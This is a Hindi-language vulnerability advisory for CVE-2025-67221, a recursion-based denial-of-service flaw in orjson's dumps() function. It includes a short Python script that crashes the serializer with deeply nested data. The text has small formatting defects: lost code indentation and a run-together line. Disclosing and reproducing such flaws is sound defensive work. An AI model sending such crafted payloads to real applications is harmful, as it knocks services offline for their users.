
CVE-2025-67221 के लिए दस्तावेज़ीकरण और पुनरुत्पादन कोड, जो orjson के dumps() फ़ंक्शन में एक denial-of-service भेद्यता है, जो गहराई से नेस्टेड JSON डेटा को सीरियलाइज़ करते समय अनियंत्रित रिकर्सन के कारण होती है।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2025-67221 |
| प्रभावित उत्पाद | orjson |
| प्रभावित संस्करण | ≤ 3.11.4 |
| भेद्यता प्रकार | सेवा से वंचित करना (अनियंत्रित पुनरावर्तन) |
| हमला वेक्टर | दूरस्थ (यदि हमलावर क्रमबद्ध डेटा को नियंत्रित करता है) |
orjson संस्करण 3.11.4 और उससे पहले के संस्करणों में orjson.dumps() फ़ंक्शन में एक सेवा-से-वंचित (denial-of-service) भेद्यता मौजूद है। गहराई से नेस्टेड JSON डेटा संरचनाओं को क्रमबद्ध (serialize) करते समय यह फ़ंक्शन पुनरावर्तन सीमा (recursion limit) लागू नहीं करता है। कोई हमलावर जो किसी एप्लिकेशन से हमलावर-नियंत्रित नेस्टेड डेटा को क्रमबद्ध करवा सकता है, क्रमबद्धकरण (serialization) रूटीन में क्रैश ट्रिगर कर सकता है।
orjson.dumps()pysrc/orjson/__init__.pyiपरीक्षण किया गया:
जो एप्लिकेशन अविश्वसनीय या हमलावर-नियंत्रित डेटा संरचनाओं को क्रमबद्ध करने के लिए orjson का उपयोग करते हैं, वे सेवा से वंचित करने वाले हमलों के प्रति संवेदनशील हो सकते हैं।
भेद्यता को स्थानीय रूप से दोहराने के लिए कोड:
import orjson
import sys
import platform
print(f'OS: {platform.platform()}')
print(f'Python version: {sys. version}')
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)
##डेमो
उपरोक्त कोड एक अच्छे core dump की ओर ले जाता है
